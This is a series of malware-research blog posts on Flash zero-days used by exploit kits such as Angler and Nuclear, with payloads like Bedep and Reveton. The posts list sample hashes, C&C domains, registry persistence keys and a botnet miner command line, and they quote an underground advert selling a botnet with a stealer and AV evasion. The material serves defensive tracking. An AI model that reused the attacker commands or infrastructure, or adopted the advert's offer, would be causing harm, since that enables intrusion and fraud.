CVE-2014-9162 (Flash 15.0.0.242 and below) integrating Exploit Kits

January 16, 2015, 7:59 am

≫ Next: Unpatched Vulnerability (0day) in Flash Player is being exploited by Angler EK

≪ Previous: Guess who's back again ? Cryptowall 3.0

$

0

0

CVE-2014-9162 has been patched on 2014-12-09. It's Affecting Flash Player 15.0.0.242 and below.

Angler EK :
2015-01-15 <- It seems.
Angler EK was really rare those days (since december). I saw many delivery path migrating to Nuclear, Neutrino or Sweet Orange. The Flash exploit did not rotate between 2014-12-24 and yesterday (when it's usually rotating every 3-4 days). It seems they are now back from vacation with a new exploit which has been identified as CVE-2014-9162 by Kaspersky (thanks !)

CVE-2014-9162 successfully exploited by Angler EK on Flash 15.0.0.223 2015-01-16

Landing after first pass of debofuscation : http://pastebin.com/KPasYHkY
(nothing specific to that CVE here)

Sample:  eeb243bb918464dedc29a6a36a25a638
Another one spotted by EKWatcher yesterday : eba97461a4ebda24c5183f66b810ea7e
And a fiddler pushed to VT.

That's all for now !

---

Unpatched Vulnerability (0day) in Flash Player is being exploited by Angler EK

January 21, 2015, 6:45 am

≫ Next: CVE-2015-0311 (Flash up to 16.0.0.287) integrating Exploit Kits

≪ Previous: CVE-2014-9162 (Flash 15.0.0.242 and below) integrating Exploit Kits

$

0

0

This is a fast post. I will update it heavily in the coming hours/days. Sorry for the resulting mess.

I spotted an instance of Angler EK which is sending three different bullets targeting Flash Player :

• Their "standard"CVE-2014-8440 - cb89e2da32a672a2b2bfea5b41f45ad5
• A fresh one (that is mentionned here and is a "downgraded"CVE-2015-0310 fixed by Flash 16.0.0.287) - 86ee0a34b6f9b57c732b1aa9f4c45575 which is striking Flash Player up to 15.0.0.242
• and a third one ( md5 not shared publicly sorry). Note : This exploit is not being used in all Angler instances. [ 2015-01-23 - CVE-2015-0311]

And it seems we have a problem with that third one  :

Angler EK exploiting last version (16.0.0.257) of Flash Player 2015-01-21

Disabling Flash player for some days might be a good idea.

As I know I will get a lot of questions and mail, here are some of the tests I made :

Exploited :

TL:DR  Any version of Internet Explorer or Firefox with any version of Windows will get owned if Flash up to 16.0.0.287 (included) is installed and enabled.

[Edit : 2015-01-22 - 15:30 GMT+2]
I did not talk about Firefox earlier cause there was a decision tree error and Firefox was not receiving the expected bullet. So i thought not talking about it was the best option.
Now that they fixed it, know that Firefox last version is owned as well
Test made with :
- Windows XP, Firefox 35, Flash 16.0.0.287
Mozilla/5.0 (Windows NT 5.1; rv:35.0) Gecko/20100101 Firefox/35.0

Till this morning Firefox users were safe. Angler EK coders fixed the issue...and they are now under fire as well

[/Edit : 2015-01-22]

- Windows XP, IE6 to 8 obviously. Flash 16.0.0.257

- Windows XP, IE6 to 8 Flash 16.0.0.287 - 2015-01-22 (replayed in lab environnement) :

Replayed session of Angler EK with Flash 16.0.0.287 - 2015-01-22 This version is Fixing another vulnerability CVE-2015-0310 wrongly reported in this blog as CVE-9162/9163

- Windows 7, IE8 , Flash 16.0.0.257 :
UA : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

- Win 8 IE10 with Windows8-RT-KB3008925-x86 (Flash 16.0.0.235) -
UA : Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)

- Win8 IE10 all updates (Flash 16.0.0.257)

- Win8.1 IE11 all updates (flash 16.0.0.257) - 2015-01-22
UA : Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko

Fully Update windows 8.1 with Internet Explorer 11 up to date. Owned - 2015-01-22

Safe :

- Chrome : They are not firing that bullet
UA: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36

More tests ongoing. I will update.

Payload :

In my opinion it's a little off topic..after flash exploitation they can do what they (multiple customer of the Exploit Kit) want and change it any time.

As I am getting a lot of question about it,  i decided to add this part.

So the payload I got is Bedep which can have one or both of this functions : AdFraud,  Malware loading.

This familly is the child of the group behind Angler EK and Reveton  (and is fast replacing Reveton in many distribution path - We have seen this Ransomware -> AdFraud transition with Kovter as well, where some do Ransomware -> Banking (as did Qadars group) ) .

When it was first spotted (around september 2014) it was not persistent but there are now persistent version of it.

It's using the legit migsetup.exe to bypass UAC

Eight Days ago :

Registry entries from the Persistent Bedep HKEY_CURRENT_USER\Software\Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32

Registry for the persistent Bedep HKEY_CURRENT_USER\Software\Classes\Drive\ShellEx\FolderExtensions\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}

Today in an XP VM :

HKEY_CURRENT_USER\Software\Classes\CLSID\{E563E00A-58B3-4A37-8D94-F67EE73C36F9}\InprocServer32

HKEY_CURRENT_USER\Software\Classes\Drive\ShellEx\FolderExtensions\{E563E00A-58B3-4A37-8D94-F67EE73C36F9}

[Sample at the end]


Bedep is working in a Hidden Desktop

Default0 is an Hidden Desktop created by bedep.

Switching to that desktop (using for instance CmdDesktopSwitch) you might see things like :

Bedep faking some browsing with a French IP here. Open many windows, scroll etc....

I often monitor bedep traffic as it's a good source of referer for exploit kit.
Zombies are often brought to Magnitude, Sweet Orange, Archie etc.... You can even get a Cryptolocker or a CTB-Locker (critroni) via browsing made by bedep.

You are looking for Bedep traffic in your Network ?
Search for traffic with :
http://24x7searcher .com , http://global-game-search .me http://canopus-a7 .in, http://hot100games .in as referer (it's fake)


Search for call to :
Bedep C&C :
wzrdirqvrh07.com
jacafyfugdnvoov .com
46.105.251.1

AdFraud C&C :
http://canopus-a7 .in/task/9004/

185.48.56.103

You may find this kind of reply :

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 22 Jan 2015 11:09:08 GMT

Content-Type: text/html

Connection: keep-alive

Vary: Accept-Encoding

Content-Length: 305

1|http://hot100games .in|http://canopus-a7 .in/redirect/b4d037973887c5c58701139a0088c424/|Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0)|en-US|343

Emet :

As i am being harassed by requests to test it, I endup installing Emet 5.1 and test it in live condition with Windows 8.1 32bits, Internet Explorer 11, Flash 16.0.0.257
I don't know how to use it. I just did an install, use recommended Settings. Finish.

Emet 5.1 after installation. Default Settings 2015-01-22

Here is what I got :

Emet 5.1 spotting StackPivot and protecting the VM against the Flash Vuln 2015-01-22

Please take it as it is ! A single pass test in One configuration.

[Edit : 2015-01-24]

You do not need an advanced weapon to effectively fire a Golden Bullet

Why bothering with an EK when you have CVE-2015-0311?Being used in standalone mode to spread Reveton on Adult Traffic pic.twitter.com/0a8JLzhOD7
— Kafeine (@kafeine) January 24, 2015

[/edit]
Files:
One Bedep Sample - Disclaimer : Sample are really fast rotating and there are x64 version as well.
Nothing else yet. But you know how to contact me.

Post Publication Reading ;
Adboe Security Bulletin - 2015-01-22

Thanks : 
Websense for inputs allowing me to make additional live tests
-----------------------
As I want to thanks them for their Trust, I will shamelessly tell you that I tested it against the free version of Malwarebytes Anti Exploit (a product from one of my customer). They stopped it. Well done !

CVE-2015-0311 (Flash up to 16.0.0.287) integrating Exploit Kits

January 29, 2015, 7:04 am

≫ Next: Reveton's design refreshed - Winter 2015

≪ Previous: Unpatched Vulnerability (0day) in Flash Player is being exploited by Angler EK

$

0

0

Patched with Flash 16.0.0.296 the CVE-2015-0311 has been first seen exploited by Angler EK ( 2015-01-20 ) , soon after used in "standalone" mode in huge malvert campaign (pushing either Reveton, either Bedep (doing adfraud and grabbing malware : Pony mostly from what I saw) )

CVE-2015-0311 used in standalone mode to drop Bedep grab Pony and perform adfraud 2015-01-28

Here are some MD5 for the Standalone CVE-2015-0311 :
656beccf7bfeefcc42c692e8320b080b
9543862cc9ae4ca77a3a683bf0c82392
f5a7aabaeb4dd62d72d74224d4064979
c1206173b4bd7d54f61e46876b89fa2f
613db35a14bc5d36fcb46603f1a73ca1
5adb0980caa5ba40125ddede266ade71

Here are some MD5 for the CVE-2015-0311 fired by Angler EK:
a956021a2a8b6351e94f11e4b799c97e - 2015-01-21 <- First spotted as it and shared.
cacd5a2271e204f3ce561cf3ca08d12c - 2015-01-22
7aff26e0ea8523c8086692a2f35fd20c - 2015-01-23
ea14f42ba6ff9f4b39158864ec98dd35 - 2015-01-25
8f45fdb14f81cd154090922769137387  - 2015-01-27  <- Once exploit extended to all Angler Threads
(Note: All were sent almost live to VT. Interestingly only one md5 leaked publicly before patch )

CVE-2015-0311 has been integrated today in RIG

RIG: 2015-01-29

[note that CVE-2014-6332 is in RIG as well. I'll update the associated post soon]
CVE id confirmed by Kaspersky (Thanks ! )

RIG successfully exploit Windows 8.1 IE11 Flash 16.0.0.257 - 2015-01-29 using CVE-2015-0311

E:\\CrackAndHack\\targets\\Flash\\exploits\\y0lny\\new4\\fd\\src;;_SafeStr_12.as

Fiddler sent to VT. (Not shared here on purpose. No need to ask in comments : why ? break % is still too high).
Sample : 196467aa4e6e1c2a66b49d465d37f9b9
[Edit] First rotated sample after that post : 270c1ff742a50a13ae68d4c88b700017 [/Edit]

FIESTA: 2015-01-31

Fiesta successfully exploit Windows XP IE8 Flash 16.0.0.257  using CVE-2015-0311 Fiesta Logo courtesy of FoxIT.

Sample: d2406805f7f8da6e2ddbb93941624c08
Fiddler sent to VT
Read More: 

A Different Exploit Angle on Adobe's Recent Zero-Day - 2015-01-27 -  Dan Caselden, Corbin Souffrant, James T. Bennett - FireEye
Top adult site xHamster involved in large malvertising campaign - 2015-01-27 - Malwarebytes Labs
Analyzing CVE-2015-0311: Flash Zero Day Vulnerability - 2015-01-26 Peter Pi - TrendMicro

Reveton's design refreshed - Winter 2015

February 5, 2015, 9:46 am

≫ Next: SkyShare : Evolution Mining Botnet System

≪ Previous: CVE-2015-0311 (Flash up to 16.0.0.287) integrating Exploit Kits

$

0

0

"Snipshot" of the Reveton DK design :)

Those days Reveton is mainly pushed  on adult traffic via "standalone"CVE-2015-0311 flash (posing as advert) calling an Xtea encoded stream.

After not far from 2 years with the same design it's now showing some fresh clothes.
This might be connected with Green Dot’s decision to stop selling MoneyPak Cards

Here in one image :

Reveton all in one 2015-02-05 Bigger : http://i.imgur.com/rtt1Iue.jpg

Here is the USA and default one (when your country has no specific one)

Reveton - US - 2015-02 (without MoneyPak)

Sample provided at the end of the post.
Launched that way :
%systemroot%\\system32\\rundll32.exe  C:\DOCUME~1\ALLUSE~1\APPLIC~1\7BCB6BAED.cpp,work

Startup shortcut properties

C&C (for what it's worth...)

162.244.35.192

14576 | 162.244.32.0/22 | HOSTING-SOLUTIONS | US | king-servers.com | Hosting Solution Ltd.

173.224.124.73

30083 | 173.224.112.0/20 | SERVER4YOU | US | hostingsolutionsinternational.com | Andriy Balytskyy

Reveton phone home 2015-02-05

Now find your country :
(Missing : BE, CY, GR, LT, LV, MT,NZ ,SK,RO)

Austria :

Reveton - AT - 2015-02

Australia :

Reveton - AU - 2015-02

Canada :

Reveton - CA - 2015-02

Switzerland :

Reveton - CH - 2015-02

 Czech

Reveton - CZ - 2015-02

 Germany

Reveton - DE - 2015-02

 Denmark

Reveton - DK - 2015-02

 Spain :

Reveton - ES - 2015-02

 Finland :

Reveton - FI - 2015-02

 France :

Reveton - FR - 2015-02

 Great Britain :

Reveton - GB - 2015-02

 Ireland :

Reveton - IE - 2015-02

 Italy :

Reveton - IT - 2015-02

 Luxembourg

Reveton - LU - 2015-02

 Mexico :

Reveton - MX- 2015-02

 Netherlands :

Reveton - NL - 2015-02

 Norway :

Reveton - NO - 2015-02

 Poland :

Reveton - PL - 2015-02

 Portugal :

Reveton - PT - 2015-02

 Sweden :

Reveton - SE - 2015-02

 Slovenia :

Reveton - SL - 2015-02

 Turkey

Reveton - TR - 2015-02

It seems design for Arabic countries did not change (yet?). See United Arab Emirates for instance :

Reveton - AE - 2015-02

Files : One sample. sha256: a519f7e944aa9f7553687993c20e3abca0e62fae3566ad5bb32d2d7961662e54
The Designs ( it's not a small amount of work, if you use, please credit your source)

Read more :
Reveton ransomware has dangerously evolved - 2014-09-19 - Avast

SkyShare : Evolution Mining Botnet System

July 15, 2014, 12:19 pm

≫ Next: CVE-2015-0313 (Flash up to 16.0.0.296) and Exploit Kits

≪ Previous: Reveton's design refreshed - Winter 2015

$

0

0

At begining of the year, an advert for a  mining botnet appeared on underground :

Piece of the Advert on the Underground

Original text of the Advert :
------------------------------------------
Предлагаю стабильную автоматическую систему по майнингу на ботах.
Краткое описание - это полноценная система «под ключ» для долгосрочного и стабильного майнинга. 
Поддерживаемые валюты: quark ( рекомендовано ) / scrypt.

Основной функционал:

Drop-system - майнер автоматически устанавливается на зараженную машину сразу после прогруза лоадера (размер - всего 13кб)

Panel - удобная панель по контролю за ботами, вы можете смотреть статистики, курсы валют коинов, прогружать на боты сторонний софт и многое другое. Помимо базовых функций в панель включен стиллер и формграббер, для получения максимального дохода с ботов.

AutoPool - каждому клиенту мы предоставляем удобную панель для майнинга валют на наших пуллах,с возможностью переключения мощностей на самую выгодную в любой момент! Только для кварковых валют: qrk,src,frq,fz,c-note,wiki ( список будет дополнятся, в зависимости появления новых валют на биржах)

Данное обновление решает следующие проблемы:
1) потерю дохода из-за падения курса / увеличения сложностей
2) бан панели управления ботами (лоадером), когда теряется возможность контроля ботов
3) недоступность пулла / бан на пуллах

CPUMaxProfit - вырабатываем quark! Теперь вы получаете максимальный профит с каждого бота, не теряя стабильности заработка! Наш софт поддерживает все доступные виды quark валют, торгующихся на рынке : qrk, src, frq, fz, c-note и wikicoin!

Поддерживаются все версии windows - если раньше quark невозможно было выработать на версиях windows, ниже Windows 7, то теперь это возможно! Работа гарантированна на любой разрядности, будь то 32 или 64бит, а так же на любой конфигурации компьютера! При том, если раньше существенно снижался доход с 32битных машинок, то теперь эта разница минимальна!

Anti-av system - в майнере имеется функция автовосстановления в системе после удаления, в 7 из 10 случаев удаления майнера антивирусником / руками после перезагрузки он будет восстановлен в системе и продолжит свою работу! 

Так же при выдаче билд майнера палится минимальным количеством антивирусов, большинство из которых непопулярны. Над усовершенствование фуд’а ведется активная работа. Майнер легко криптуется, при надобности дадим контакты криптосервисов,где вы можете получить скидку при крипте нашего продукта ( работают практически 24/7 )
Включен обход UAC!

Mining Community - для владельцев нашего майнера предоставляем доступ к сообществу, где обсуждаются все последние новости по софту, а так же имеется возможность предложить свою идею по развитию проекта.

Стабильность - за последние 3 месяца работы мы потеряли не более 10% скорости от общего числа производимых коинов и могу смело сказать, что майнеры живут месяцами (а может и годамиsmile.gif

Абузоустойчивость - каждая система располагается на мощнейшем серверном оборудовании, способном выдержать сотни тысяч ботов. К прокси / лоадеру привязаны абузоустойчивые домены, а сверху на систему наложено проксирование посредством технологии FastFlux, благодаря ей вы можете не боятся за свою безопасность во время работы с системой!

Поддерживаемые коины - наш бот поддерживает любые коины на алгоритмах quark / scrypt ( litecoin, dogecoin, securecoin и другие ). В данный момент система направлена на выработку именно quark коинов. Почему именно их? Читаем ниже в faq. Но если вы хотите майнить скриптовые коины - не проблема, все отличие только в том, что автопулл под них пока что не разрабатываем и вам надо будет выбрать пулл , куда будете майнить (Или саппорт подскажет актуальный пулл под вашу валюту).

Ценовая политика:
Только абонементная работа ( ввиду сложности системы ):

750$ первый месяц работы, 400$ последующие. 

В цену включено: 2 панели (лоадера и майнера), exe дроппера, а так же exe майнеров и постоянные обновления. 

Частые акции и скидки от нас и наших партнеров!

Оплата любым удобным вам видом валюты -от W1, Yandex Money, WM, Perfect, QIWI и до любого актуального криптокоина!

Популярные вопросы и ответы на них:

- А через гаранта работает?
- Работаем.

- Почему в аренду?
- Потому что система требует тонкой настройки и наш сервер тончайшим образом настроен под данную связку, так же мы не одобряем сливы в паблик.

- Криптовать надо постоянно?
- Лоадер - если хотите что бы боты провисели дольше, то да, следует регулярно обновлять крипт на ботах (таск update по текущим ботам), майнеры криптовать только перед прогрузом, далее они работают независимо от дроппера.

- Сколько живут майнеры в системах?
- Месяцами.

- Вы грузите?
- Сейчас - нет, как начнем - объявим обязательно. Для майнинга подойдет любой микс, будь то снг, азия, европа или сша.

- А почему кварк? Алгоритм малопопулярен и курсы низкие!
- Этому выбору есть несколько причин:
1) Сложность практически не изменяется, таким образом вы будете получать столько же коинов,сколько и получали во все время работы.
2) Алгоритм оптимизирован на работу цпу, таким образом асики не выйдут и курсы/ сложности не обвалятся, как это в данный момент происходит со скриптовыми валютами
3) Майнинг возможен на абсолютно любой конфигурации машины.
4) Произведена глубокая оптимизация, и сейчас сервера с пуллами выдерживают огромные скорости со стороны ботнетов, а так же возможно быстрое расширение парка, для поглощения максимальной доли вырабатываемых коинов из общей сети.
5) Касательно курсов обмена - над этим ведется работа, в течении месяца представим вам кое-что крутое wink.gif

- А сколько выдержат ваши пуллы? У меня парк из 100к ботов!
- И 100к выдержат,и в разы больше. Предоставляем несколько потоков для удобного менеджмента ваших скоростей.

- А я не хочу майнить кварк, хочу майнить дог или лайт или любой другой скриптовый коин!
- Без проблем, как делали, так и будем поддерживать скриптовую версию майнера, но автопулл под него делать не планируем и пуллы поднимать так же.


По всем вопросам писать в наш саппорт:
jid: ph0enix@armada.im
icq: 498758324

По вопросам технического характера, для владельцев майнера , писать на jid: xiii@armada.im
------------------------------------------
Google Translated as :
------------------------------------------
Suggest a stable automatic system for Mining on boats. 
Short description - a complete system of "turnkey" for long-term and stable Mining. 
Supported currencies: quark (recommended) / scrypt. 

The main features: 

Drop-system - a miner is automatically installed on the victim machine immediately after progruz loader (size - only 13KB) 

Panel - convenient control panel to control the bot, you can watch statistics, exchange rates Coin, progruzhat bots on the third party software and more. Besides the basic functions in the panel included Stiller and formgrabber, maximizing proceeds with bots.

AutoPool - every client we provide convenient panel for mining rates on our pool products with the possibility of switching capacity on the best at any moment! Only for the quark exchange: qrk, src, frq, fz, c-note, wiki (a list will be supplemented, depending on the appearance of new currency exchanges) 

This update addresses the following issues: 
1) loss of income due to depreciation / increasing complexities 
2) ban bots control panel (the loader), when lost the ability to control bots 
3) the unavailability of the pull / ban for Pullach 

CPUMaxProfit - are working out quark! Now you get the maximum profit from each bot without losing the stability of earnings! Our software supports all available types of quark currencies traded in the market: qrk, src, frq, fz, c-note and wikicoin! 

It supports all versions of windows - if earlier it was impossible to develop a quark versions on windows, under Windows 7, it is now possible! Work is guaranteed to any digit, whether 32 or 64bit, as well as on any computer configuration! Though, if earlier significantly decreased income from 32 bit machines, but now the difference is minimal!

Anti-av system - a miner has AutoRecover in the system after the removal, in 7 of 10 cases of removal miner antivirusnikah / hands after reboot it will be restored in the system and will continue to work! 

Just when issuing build miner palitsya minimum amount of antivirus, most of which are unpopular. Improvement over fud'a active work. Miner easily crypto, if necessary, give kriptoservisov contacts where you can get a discount at the crypt of our product (work almost 24/7) 
Included bypass UAC! 

Mining Community - for the owners of our miner provide access to the community, where we discuss all the latest news on a software as well as the possibility to propose his idea for the development project. 

Stability - the last 3 months of work we have lost more than 10% of total rate produced a coin and I can safely say that the miners live for months (and maybe godamismile.gif 

Bulletproof - each system is located on a powerful server hardware that can support hundreds of thousands of bots. By proxy / loader attached bulletproof domains, and on top of the system imposed by proxy technology FastFlux, thanks to her, you can not fear for their safety during the operation of the system! 

Supported Coin - our bot supports any Coin on algorithms quark / scrypt (litecoin, dogecoin, securecoin and others). Currently the system is aimed at developing a quark Coin. Why them? Read below in the faq. But if you want to script Mein Coin - no problem, all the only difference is that under avtopull them yet do not develop and you will have to select a pull, which will Maini (Or tell a support under the actual pull your currency). 

Pricing policy: 
The subscription only work (due to the complexity of the system): 

$ 750 first month, $ 400 the next. 

Price includes: 2 panels (loader and miner), exe dropper, as well as exe miners and constant updates. 

Frequent promotions and discounts from us and our partners! 

Pay any way you view currency - from W1, Yandex Money, WM, Perfect, QIWI prior to any actual kriptokoina! 

Popular questions and answers: 

- A guarantor through work? 
- Working. 

- Why rent? 
- Because the system requires fine-tuning and our server is configured under the subtlest way this bunch, because we do not approve of public plums. 

- Kriptovat must constantly? 
- Loader - if you want that bots hung longer, then yes, you should regularly update the crypt on boats (TASK update on current bots), just before the miners kriptovat progruz, then they work regardless of dropper. 

- How many miners live in the systems? 
- A month. 

- Do you ship? 
- Now - no, we start - declare mandatory. Suitable for mining any mix, whether CIS, Asia, Europe or the United States. 

- And why the quark? Malopopulyaren algorithm and low rates! 
- This choice has several reasons: 
1) Complexity is practically unchanged, so you'll get the same Coin how to obtain all the work. 
2) The algorithm is optimized to work cpu so Asik will not leave and courses / complexity not cave in, as is currently happening with scripted currencies 
3) Mining is possible on any machine configuration. 
4) Produced deep optimization, and now server Pulliam kept tremendous speeds by botnets, as well as possible the rapid expansion of the park, to absorb the maximum share of the total produced Coin network. 
5) Regarding the exchange rates - on this work is being done within a month will introduce you to something cool wink.gif 

- And how many will survive your Pulliam? I have a fleet of 100k bots! 
- And 100k survive, and many times more. Provide multiple threads for easy management of your speed. 

- I do not want Mein quark want Mein dog or light or any other scripting a coin! 
- No problem, as we did, and we will support scripting version miner, but avtopull under it and do not plan to raise Pulliam as well. 


On all questions write to our support: 
jid: ph0enix@armada.im 
icq: 498758324 

For questions of a technical nature, for owners miner writing on jid: xiii@armada.im
------------------------------------------


Thanks again  to an Independant researcher from Russia who shared some referer driving to what looks like a TDS I face a new for me infection chain.

3 tds call then Nuclear Pack pushing 2 samples

The .ok call was triggered on mouse move :

killbot function in the redirector Not sure how much bot would be stopped by this...

Two Payloads :

a40db0fb9bfaf25dfddcd1aaf068d133 (Tofsee) and 9d82ce5c093390003a0f8b976610e479 ( an Andromeda)

Here are some request from that Andromeda :

http://yaybit.net/0x0x/image.php

POST /0x0x/image.php HTTP/1.1 Host: yaybit.net User-Agent: Mozilla/4.0 Content-Type: application/x-www-form-urlencoded Content-Length: 44 Connection: close

And the ET open rules fired in Suricata :

06/24/2014-01:45:07.423116 [**] [1:2404163:3496] ET CNC Zeus Tracker Reported CnC Server group 14 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80

06/24/2014-01:45:07.877385 [**] [1:2003492:16] ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80

06/24/2014-01:45:08.566311 [**] [1:2016223:8] ET TROJAN Andromeda Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80

A look at the C&C:

Binary don't lie :) We have an andromeda 2.06 Forked Panel surely based on the leaked version. 2014-06-24 - 57k bots

Meaningfull Background :)

Sky Share version (bottom right of the Panel)

The botnet was growing really fast. 57k in one week. Then 1 week of rest and a jump in 1 day to 72k total (including dead one) bots.

2014-07-01 - 72k bots

Geo repartition :

That Sky Share geo repartition - 2014-06-24

Tasks List (the miner)

8d07b2d0062bfc7e4c7b8052e0a17646 (32) and cc560f5a630ee48365517125c173a94d (64)

minerd.exe -a scrypt -o stratum+tcp://zerofloor.net:16166 -u 16166 -p x

In the stats it's just the current values of main crypto currencies

The stealer part was not operationnal on that one but here is how it looks.



The andromeda form grabber :

RU/UA focused RegExp

Someone was selling this kind of setup on underground :

------------------------------------------
Лодер на базе андромеды прогружает ехе майнера.
В наличии ботнет 27к ботов (боты за ближайшие сутки 24часа).

Отдам всё что давали с лицензией: некриптованый файл лодера, два ехе майнеров(для 32 и 64 битных ос), стиллер-граббер пассов из браузера+грабер кошелей биткоин, доступ на лодер+стата активных майнеров (лодер хотится на FastFlex овнерами майнера - не надо парится за абузы и хостинг) .
Лицензия+не_хилый_парк_ботов= 2300$.

СРОЧНО, пишите в ПМ контакт кому надо.

Причина продажи: срочно нужны деньги.
------------------------------------------
Loder based Andromeda progruzhat exe miner. 
Available 27k botnet bots (bots for the next day 24hours). 

I will give all that gave license: nekriptovany file Loder, two miners exe (for 32 and 64 bit OS), Stiller grabber passes from browser + Graber Koshelev Bitcoin, access to Loder + become active miners (Loder hotitsya on FastFlex ovnerami miner - not need for steamed abuzy and hosting). 
License + ne_hilyy_park_botov = $ 2300. 

URGENT, write to the PM who should be contacted. 

Reason for sale: need money urgently. 
------------------------------------------

Author did not reply to questions about the incomes...but we can guess those were not that huge.

So. Bummer. Andromeda and a stratum coin miner. I like that post as less as i liked the "Silence Exploit Kit" one.

Fiddler : NuclearPack_Andro_Tofsee_2014-06-24

CVE-2015-0313 (Flash up to 16.0.0.296) and Exploit Kits

February 11, 2015, 4:12 am

≫ Next: New crypto ransomware in town : CryptoFortress

≪ Previous: SkyShare : Evolution Mining Botnet System

$

0

0

Reported by TrendMicro (2015-02-02), fixed with Adobe Flash Player 16.0.0.305, the code to exploit CVE-2015-0313 has been introduced in Hanjuan Exploit Kit at beginning of december 2014  according to Malwarebytes

Hanjuan is the name chosen by @MalwareSigs for an Exploit Kit he first reported on 2013-10-14.

I would say this pastebin from 2011 is already showing a traff/stats tuple from Hanjuan (or an ancestor).

pastebin from 2011 - Candidate for stats/traff link for Hanjuan ancestor

On the 2015-02-03, I captured a Fiddler of the live chain exploiting CVE-2015-0313 as spotted by Trendmicro in their telemetry.

Full chain to bedep via CVE-2015-0313 - 2015-02-03

So despite what Dailymotion is claiming here , their USA users were indeed affected by this "0day".
But this can happen to any company showing ads. A web advert is often the result of a long chain of trust...(as software/drivers in operating system...one fail, everyone fall).

The problem for me in that case is that Engage:BDR (delivery.first-impression.com) was totally aware that this specific customer (Caraytech group - e-planning.net ) was conditionally redirecting users to Hanjuan Exploit Kit.
I sent them a warning on 2014-12-12 and after not far from 80 mail exchanges till 2014-12-28, I decided to stop communicating with them as they were litigious and obviously not willing to stop the involved advert IDs. There were also many tweets from @BelchSpeak illustrating the issue.

You may now understand that tweet which is not exactly in line with my timeline.

(Note : I might ask for some help in case Engage:BDR decides to go the legal way against me because of this post - The irony : being more afraid from "legit" company than  from guys converting coffee in malware activity)

This exploit without a surprise is now being rolled in other Exploit Kit and again no surprise Angler is the first one.

Angler :

2015-02-10

First spotted by @SecObscurity, CVE id confirmed by : Kaspersky.
Thanks Nathan Fowler for the Referer.

Angler EK successfully exploiting CVE-2014-6332 and CVE-2015-0313 2015-02-11

Sample : 7143b55441f5ba77ed7bba5c39a9a594cb59d8d1d826f1f6e7c1085b8a85cddd

Timo's (from F-Secure) comment on it :

Go home, Angler exploit kit, you're drunk - and you forgot to obfuscate your Flash exploit. pic.twitter.com/O1EZmlwrNq
— Timo Hirvonen (@TimoHirvonen) February 11, 2015

Commented Fiddler sent to VT

For who want the Necurs and Pony
(note : this pony that is around (in poke a mole mode)
[Right now : 02/11/2015 afraid.magicmotors.xyz [**] /news.php 37.59.5.218:80 ]
since at least october is most probably operated by the Bedep/Angler Team or a really close partner)

Read More :
Analyzing CVE-2015-0313: The New Flash Player Zero Day - 2015-02-04 - Peter Pi - TrendMicro
A New Zero-Day of Adobe Flash CVE-2015-0313 Exploited in the Wild - 2015-02-03 - Ben Hayak - SpiderLabs
HanJuan EK fires third Flash Player 0day - 2015-02-03 - Malwarebytes Lab
Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements - 2015-02-02 - Peter Pi - TrendMicro
Shining some light on the ‘Unknown’ Exploit Kit - 2014-08-28 Jerome Segura - MalwareBytes
Unknown EK - 2013-10-14 - MalwareSigs

New crypto ransomware in town : CryptoFortress

March 4, 2015, 5:06 am

≫ Next: CVE-2015-0336 (Flash up to 16.0.0.305) and Exploit Kits

≪ Previous: CVE-2015-0313 (Flash up to 16.0.0.296) and Exploit Kits

$

0

0

Blitz post.
[This post has been heavily edited to  fix my mistake.

@kafeine after further verification, it seems CryptoFortress is completely different from TorrentLocker. They only stole the HTML and CSS.
— Marc-Etienne M.Lévei (@marc_etienne_) March 6, 2015

]

I was hunting for Gootkit (pushed in a Nuclear Pack instance in France those days) but instead I got a Teerac.A  new crypto ransomware.

Nuclear Pack pushing CryptoFortress via CVE-2013-2551 - FR - 2015-03-04 (have no sure explanation for the 444 error on the "undefined" and CVE-2015-0311 call in that pass).

I thought i was facing Teerac.A (aka TorrentLocker) which was showing that design :

Clicking on the "Buy Decryption software" :

The sample I got today is showing a close identity :  CryptoFortress

Clicking on the "Buy decryption software"

Samples :  Torrent Locker and a fresh CryptoFortress
26f13c4ad8c1ccf81e80a556cf6db0af - 2014-10-25
e6dda3e06fd32fc3670d13098f3e22c9 - 2015-03-04


Read more :
(PDF) TorrentLocker - Ransomware in a country near you - 2014-12 - Marc-Etienne M.Léveillé - Eset

Post Publication Reading :
CryptoFortress - 2015-03-06 - Renaud Tabary - CertLexsi

CVE-2015-0336 (Flash up to 16.0.0.305) and Exploit Kits

March 20, 2015, 12:28 am

≫ Next: CVE-2015-0359 (Flash up to 17.0.0.134) and Exploit Kits

≪ Previous: New crypto ransomware in town : CryptoFortress

$

0

0

As reported by Malwarebytes and FireEye, Nuclear Pack is now taking advantage of a vulnerability patched with the last version of Flash Player ( 17.0.0.134 )


Nuclear Pack : Thanks @TimoHirvonen for CVE identification
Appeared there in the morning of 2015-03-19 with this sample : cff213130ade23a2d03423305cff0639.

CVE-2015-0336 fired by Nuclear Pack 2015-03-20

Nuclear Pack is Firing both CVE-2015-0311 and CVE-2015-0336 depending on the instance you land on. The CVE-2015-0336 has rotated today :
c316dc31b8d4f85e655e15aa75c7b999 and later:
8c129a72b64580e0d1cf4d1e2324eb0f

Fiddler pushed to VT : Here

2015-03-20 - 17h rewording to avoid confusion. The two Flash CVE are not in the same sample.
